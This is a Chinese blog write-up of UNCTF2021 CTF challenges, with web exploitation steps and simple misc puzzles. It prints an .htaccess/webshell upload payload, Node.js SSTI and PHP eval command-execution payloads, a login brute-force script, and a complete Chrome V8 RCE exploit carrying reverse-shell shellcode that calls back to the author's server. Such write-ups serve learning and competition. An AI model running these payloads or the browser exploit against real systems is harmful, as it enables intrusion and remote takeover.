[CTF]UNCTF2021 WP

最新推荐文章于 2024-08-15 10:57:13 发布
最新推荐文章于 2024-08-15 10:57:13 发布
阅读量1.5k 收藏 8
点赞数
分类专栏: CTF 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sapphire037/article/details/121614375
版权

WEB

fuzz_md5

爆破找前6位为666666的md5的值,然后常规操作即可得到flag

import hashlib
import re
for a in range(1,1000000000):
	b=hashlib.md5(str(a).encode("utf-8"))
	c=(b.hexdigest().encode("utf-8"))
	if c[0:6]==b'666666':
		print(a)
		#print(c)

babywrite

<?php
highlight_file(__FILE__);
$sandbox = md5($_SERVER['REMOTE_ADDR']);
if (!is_dir($sandbox)) {
    mkdir($sandbox);
}
if (isset($_GET['filename']) && isset($_GET['content'])) {
    $filename = $_GET['filename'];
    $content = $_GET['content'];
    if (preg_match_all("/ph|\.\.|\//i", $filename) || strlen($filename) > 10) {
        die("No way!");
    }
    if (preg_match_all("/<\?|ph/", $content)) {
        die("No way!");
    }
    $filename = $sandbox . "/" . $filename;
    @file_put_contents($filename, $content);
    echo $filename;
}

传.htaccess

?filename=.htaccess&content=AddType application/x-httpd-p\%0Ahp .png%0Ap\%0Ahp_value a\%0Auto_append_file "p\%0Ahp://filter/convert.b\%0Aase64-decode/resource=a.png"

传a.png

PD9waHAgZXZhbCgkX1BPU1Rbc2FwXSk7Pz4=

然后
请添加图片描述

nodejs_ssti

随便乱输个,报错,sodajs,找sodajs的ssti,构造一手(好吧偷的)

{{ " ".toString.constructor("return global.process.mainModule.constructor._load('child_process').execSync('ls').toString()")() }}

然后cat /flag即可

phpmysql

<?php
show_source(__FILE__);
echo("欢迎来到unctf2021,have fun"."<br>");

$db_host=$_POST['host'];
$db_user=$_POST['user'];
$db_pwd=$_POST['pwd'];
$db_port=$_POST['port'];

if($db_host==""){
    die("数据库地址不能为空!");
}

if(is_numeric($db_host)){
    echo("fakeflag is /flag"."<br>");
    if(preg_match("/;|\||&/is",$db_user) || preg_match("/;|\||&/is",$db_pwd) || preg_match("/;|\||&/is",$db_port)){
        die("嘉然今天吃什么");
    }
    system("mysql -h $db_host -u $db_user -p $db_pwd -P $db_port --enable-local-infile");
}
else{
    echo("Maybe you can do someting else"."<br>");
    if(!isset($db_user) || !isset($db_pwd)){
        eval("echo new Exception(\"<script>alert('关注嘉然,顿顿解馋!!!');</script>\");");
    }
    else{
        $db_user = str_ireplace("SplFileObject", "UNCTF2021", $db_user);
        eval("echo new $db_user($db_pwd);");
    }
}

注意到后面两个可控参数

$db_user = str_ireplace("SplFileObject", "UNCTF2021", $db_user);
        eval("echo new $db_user($db_pwd);");

用异常报错执行rce,ctfshow上有对应知识点。
payload:

host=c&pwd=system("tac /fllllaaaaag")&user=exception

encrypt_login

题目说了

I can tell you my name is admin and my password is made by number only. This time, you can not to buster my password :)

密码纯数字,但是有js加密过,混淆又解不开,bp没法爆,这里贴上脚本

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

if __name__ == '__main__':
    browser = webdriver.Chrome(executable_path=r"D:\Program Files\Google\Chrome\Application\chromedriver.exe")
    browser.get("http://0578b386-07e3-45c0-8eee-97b1f3546d01.node1.hackingfor.fun/login.php")
    try:
        WebDriverWait(browser, 10).until(
            EC.presence_of_element_located((By.XPATH, '//*[@id="submit"]'))
        )
    except Exception as e:
        browser.quit()
        exit(1)
    browser.execute_script("document.querySelector('#username').value='admin'")
    for password in range(999999):
        # password=1234
        browser.execute_script(
            "document.querySelector('#password').value='%s';document.querySelector('#submit').click()" % (
                str(password)))

网页照相馆

hint说注意user-agent,我放了个自己vps的xss平台地址上去让他访问,捕获到chrome版本还有系统,百度一下有这个版本的远程代码执行漏洞0day。打开viper新增一个监听载荷请添加图片描述
将生成的c文件里的内容稍作修改替换原本漏洞的exp里的shellcode,变成

<script>
    function gc() {
        for (var i = 0; i < 0x80000; ++i) {
            var a = new ArrayBuffer();
        }
    }
    let shellcode = [0x48,0x31,0xff,0x6a,0x09,0x58,0x99,0xb6,0x10,0x48,0x89,0xd6,0x4d,0x31,0xc9
,0x6a,0x22,0x41,0x5a,0xb2,0x07,0x0f,0x05,0x48,0x85,0xc0,0x78,0x51,0x6a,0x0a
,0x41,0x59,0x50,0x6a,0x29,0x58,0x99,0x6a,0x02,0x5f,0x6a,0x01,0x5e,0x0f,0x05
,0x48,0x85,0xc0,0x78,0x3b,0x48,0x97,0x48,0xb9,0x02,0x00,0x04,0x57,0x51,0x47
,0x55,0x3c,0x51,0x48,0x89,0xe6,0x6a,0x10,0x5a,0x6a,0x2a,0x58,0x0f,0x05,0x59
,0x48,0x85,0xc0,0x79,0x25,0x49,0xff,0xc9,0x74,0x18,0x57,0x6a,0x23,0x58,0x6a
,0x00,0x6a,0x05,0x48,0x89,0xe7,0x48,0x31,0xf6,0x0f,0x05,0x59,0x59,0x5f,0x48
,0x85,0xc0,0x79,0xc7,0x6a,0x3c,0x58,0x6a,0x01,0x5f,0x0f,0x05,0x5e,0x6a,0x7e
,0x5a,0x0f,0x05,0x48,0x85,0xc0,0x78,0xed,0xff,0xe6];
    var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]);
    var wasmModule = new WebAssembly.Module(wasmCode);
    var wasmInstance = new WebAssembly.Instance(wasmModule);
    var main = wasmInstance.exports.main;
    var bf = new ArrayBuffer(8);
    var bfView = new DataView(bf);
    function fLow(f) {
        bfView.setFloat64(0, f, true);
        return (bfView.getUint32(0, true));
    }
    function fHi(f) {
        bfView.setFloat64(0, f, true);
        return (bfView.getUint32(4, true))
    }
    function i2f(low, hi) {
        bfView.setUint32(0, low, true);
        bfView.setUint32(4, hi, true);
        return bfView.getFloat64(0, true);
    }
    function f2big(f) {
        bfView.setFloat64(0, f, true);
        return bfView.getBigUint64(0, true);
    }
    function big2f(b) {
        bfView.setBigUint64(0, b, true);
        return bfView.getFloat64(0, true);
    }
    class LeakArrayBuffer extends ArrayBuffer {
        constructor(size) {
            super(size);
            this.slot = 0xb33f;
        }
    }
    function foo(a) {
        let x = -1;
        if (a) x = 0xFFFFFFFF;
        var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));
        arr.shift();
        let local_arr = Array(2);
        local_arr[0] = 5.1;//4014666666666666
        let buff = new LeakArrayBuffer(0x1000);//byteLength idx=8
        arr[0] = 0x1122;
        return [arr, local_arr, buff];
    }
    for (var i = 0; i < 0x10000; ++i)
        foo(false);
    gc(); gc();
    [corrput_arr, rwarr, corrupt_buff] = foo(true);
    corrput_arr[12] = 0x22444;
    delete corrput_arr;
    function setbackingStore(hi, low) {
        rwarr[4] = i2f(fLow(rwarr[4]), hi);
        rwarr[5] = i2f(low, fHi(rwarr[5]));
    }
    function leakObjLow(o) {
        corrupt_buff.slot = o;
        return (fLow(rwarr[9]) - 1);
    }
    let corrupt_view = new DataView(corrupt_buff);
    let corrupt_buffer_ptr_low = leakObjLow(corrupt_buff);
    let idx0Addr = corrupt_buffer_ptr_low - 0x10;
    let baseAddr = (corrupt_buffer_ptr_low & 0xffff0000) - ((corrupt_buffer_ptr_low & 0xffff0000) % 0x40000) + 0x40000;
    let delta = baseAddr + 0x1c - idx0Addr;
    if ((delta % 8) == 0) {
        let baseIdx = delta / 8;
        this.base = fLow(rwarr[baseIdx]);
    } else {
        let baseIdx = ((delta - (delta % 8)) / 8);
        this.base = fHi(rwarr[baseIdx]);
    }
    let wasmInsAddr = leakObjLow(wasmInstance);
    setbackingStore(wasmInsAddr, this.base);
    let code_entry = corrupt_view.getFloat64(13 * 8, true);
    setbackingStore(fLow(code_entry), fHi(code_entry));
    for (let i = 0; i < shellcode.length; i++) {
        corrupt_view.setUint8(i, shellcode[i]);
    }
    main();
</script>

然后放到vps里,起一个服务

python3 -m http.server xxxx(端口号)

起好之后把vps:xxxx地址填进去让bot去照相,也就是访问,然后就可以成功上线
请添加图片描述
之后就可以拿flag了

MISC

1.简单日志审计

一串base64解密

2.电信诈骗

变异凯撒

#!/usr/bin/env python
# coding:utf-8


def b_kaisa(mstr):
    j = 4
    i = 0
    lmstr = []
    for i in range(len(mstr)):
        m = ord(mstr[i])          # 将密文的第i个字母变为其ascii码值
        m = m + j                 # ascii值+j
        lmstr.append(m)           # 将递进后的ascii值存入列表lmstr[]
        i = i+1
        j = j+1
    return lmstr


if __name__ == '__main__':
    m_str = 'qi]m^roVibdVbXUU`h'    # 密文
    lstr = []
    lstr = b_kaisa(m_str)
    for i in lstr:
	    print(chr(i),end='')

3.引大流咯,happy

非常无语的改高度,算一下十六进制值然后找到改一下就行了

4.倒立洗头

一开始没发现什么,strings看看,发现一串倒过来的base64,拿去解码得到

佛日:上俱故。遠大密隸怯除多皤孕耨爍梵地諳薩侄究缽老諳不想皤者滅罰輸缽阿侄滅梵夢侄不冥吉真梵沙缽度即缽隸怯明侄切侄知呐地南呼舍咒奢佛涅哆姪神密明哆逝室地恐冥呼怯佛喝哆伽都怯遮諳倒缽帝冥帝輸曰諳麼俱怖俱苦俱波

很无语的是这个是日 不是曰 改过来即可得到flag

5.LPL

图片文件用tweakpng打开,错误的crc值拿去转一下得到压缩包密码,EDGnb!!打开以后得到一个b站链接和一个截图,截图上面是时间,盲猜弹幕或者评论,然后在对应的世界找到评论,得到flag

Sapphire037
关注
专栏目录
UNCTF 2021部分wp
m0_46599939的博客
12-10 4271
UNCTF 2021 部分WP 1.WEB (1)fuzz_md5 Get、post传参,preg_replace 的绕过再搞一个md5强碰撞得到开头66666开头的,0e347857 Pyload: 得到flag (2)Can_you_hacked_me 查看源代码 www.zip,数据库 和index.php 这waf绕不过,remote_addr也伪造不了,老实传参了admin 加个空格(约束),密码admin secret (3)Phpmysql 审计后这段考的php原生类,百度了一波可以
[CTF]Hitcon2021 W3rmupPHP赛后复现
Sapphire037的博客
12-06 703
前言 周末DNUICTF,UNCTF,HITCON连轴转,太菜了做不出,赛后看到大佬的思路才知道怎么搞 WP 源码: <?php if (!isset($_GET['mail'])) highlight_file(__FILE__) && exit(); $mail = filter_var($_GET['mail'], FILTER_VALIDATE_EMAIL); $addr = filter_var($_S
UNCTF2021 部分wp.pdf
12-10
unctf2021
2021UNCTF
m0_61906064的博客
12-10 365
0x1webmd5 根据这个函数可知他会把unctf换为空,所以我们要绕过,我想如果输入unctunxtff把unctf换为空 后就会留下unctf那么就可以进入下一部分 然后我们就得用post传参,可以通过火狐的hackbar传 ...
2024年网络安全最新CTF_WP-攻防世界web题解
最新发布
2401_84215240的博客
08-15 1428
参考:https://www.cnblogs.com/gradyblog/p/16989750.html查看源码提示source.php并且还提到了一个hint.php,查看提示flag在这个里面先看前面的源码source.phprequest接收参数file,判断是否为空、是否是string、checkfile如果满足,则包含file否则打印滑稽所以应该是要把ffffllllaaaagggg文件包含进file,关键就是怎么绕过checkfile。
UNCTF 2021---Web wp
3tefanie丶zhou的博客
11-29 2552
【人间事,其实好坏之别,往往就只差那么一两句话,就可以好坏颠倒。气头上,多了一两句不该有的重话反话,平日里,少了一两句宽慰人心的废话好话。】
UNCTF2021 部分WP
weixin_46356548的博客
12-07 2397
Cola UNCTF2021 Writeup Web fuzz_md5 审计源码,需传入user、pass,user需要=“unctf”,pass的md5前5位需要=“66666”。 user使用preg_replace,替换unctf为空,但仅替换一次,可使用ununctfctf双写绕过。 $a=preg_replace("/unctf/i","",$user); md5使用脚本爆破 import hashlib md5 = "66666" for asc1 in range(48,123):
UNCTF2021-easyserialize
m0_61666690的博客
12-07 544
前言 算是第一次独立做出来的一道web题,想了我两天。。。 本题利用到的知识点: 1.PHP反序列化字符逃逸 UNCTF2020的一道easyunserialize,类似 2.目录穿越 UNCTF2020的一道easy_ssrf,类似 3.pop链 BUUCTF的ezpop,类似 灵感就来源于这两道题 一、源码 二、POP链构造 1.function.php 先看哪里可以利用到flag 可以看到me7eorite这个类里有readfile函数,可以用来读flag 但是有
UNCTF misc 和crypot的wp
11-09
UNCTF misc 和crypot的wp
UNCTF2020 | Web Wp
Lemon's blog
11-24 2667
Misc baba_is_you 工具打开文件,访问一下就会看到flag了
【总结】2021unctf校内(cry&misc)
jialuomore的博客
12-13 1010
毕竟初次接触正规比赛题,没什么经验,题型也没见多少,再加上基础知识方面还很欠缺,不了解原理题目变化就会很头疼。 下面总结一下本次解题思路: misc LPL: 下载附件是一个zip压缩包,直接解压得到.png和.zip文件 图片win可以打开(linux打不开),没有信息,再看压缩包需要密码(010观察是真加密),无法爆破,猜测密码应该隐藏在图片中 010打开图片发现提示,根据官方wp...
UNCTF2021 小部分的writeup
mumuzi的博客
12-07 2451
Misc 简单日志审计 在更新附件之前flag是在描述里的,更新11/29晚上18点更新放到附件里了 总之就是一共3个base64串,解密就看到flag了,flag要不要/忘了 UNCTF{CTF?YouShouJiuXing} 电信诈骗 变异凯撒 s = 'qi]m^roVibdVbXUU`h' # f = 'unctf' for i in range(len(s)): print(chr(ord(s[i]) +4+i),end='') unctf{yauoreright} 引大流咯,hap
UNCTF2021-reverse-部分wp
ookami6497的博客
12-09 1333
reverseezloginrejunkpy_tradeezMazeezDriverchallezPuzzle ezlogin 简单签到题,IDA32位打开,flag就在login()中 跟进查看 #include <stdlib.h> #include <stdio.h> #include <string.h> #include <math.h> ```c int login(void) { double v0; // st7 sig
UNCTF 2020 WP
qq_45796470的博客
03-11 2594
UNCTF 2020 WP WEB easy_ssrf 由题ssrf,且代码过滤了很多重要手段。这里可以直接/?url=unctf.com/…/…/…/…/flag。直接…/穿越读flag。 easyunserialize <?php error_reporting(0); highlight_file(__FILE__); class a { public $uname; public $password; public function __construct($un
2020-11-15 UNCTF部分pwn的wp
eeeeeight的博客
11-15 317
第一题:     直接用pwn里的recv( )就行了 do you like me:     直接覆盖到ip返回地址就好了 #!/usr/bin/env python # coding=utf-8 from pwn import * sh=remote('node2.hackingfor.fun',36806) #sh=process('./like') sh.recv() sh.sendline(p64(0)*3+p64(0
【刷题日志3.4--3.10】
qq_74240553的博客
03-06 921
ctf
[红明谷杯]wp(正则注入,hex绕过)
Huamang的博客
04-03 772
write_shell <?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{ retur
Nodejs ctf 基础
qq_61768489的博客
07-23 1764
总结数字与字符串比较时,会优先将纯数字型字符串转为数字之后再进行比较;而字符串与字符串比较时,会将字符串的第一个字符转为ASCII码之后再进行比较,因此就会出现第五行代码的这种情况;总结空数组之间比较永远为false,数组之间比较只比较数组间的第一个值,对第一个值采用前面总结的比较方法,数组与非数值型字符串比较,数组永远小于非数值型字符串;数组与数值型字符串比较,取第一个之后按前面总结的方法进行比较。应该执行eval()函数,可以执行js代码,那么就可以执行系统命令了。依旧是get传eval。...
Node.js静态服务器,单文件,无任何依赖,拟添加部分SSI支持
大道至简
05-22 147
代码尽可能精简 防目录遍历攻击 支持Last-Modified 异步机制,大文件优化 #!/usr/bin/env node const http = require('http'); const process = require('process'); const fs = require('fs'); const path = require('path'); const root = process.cwd() + path.sep; http.createServer(async (re.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值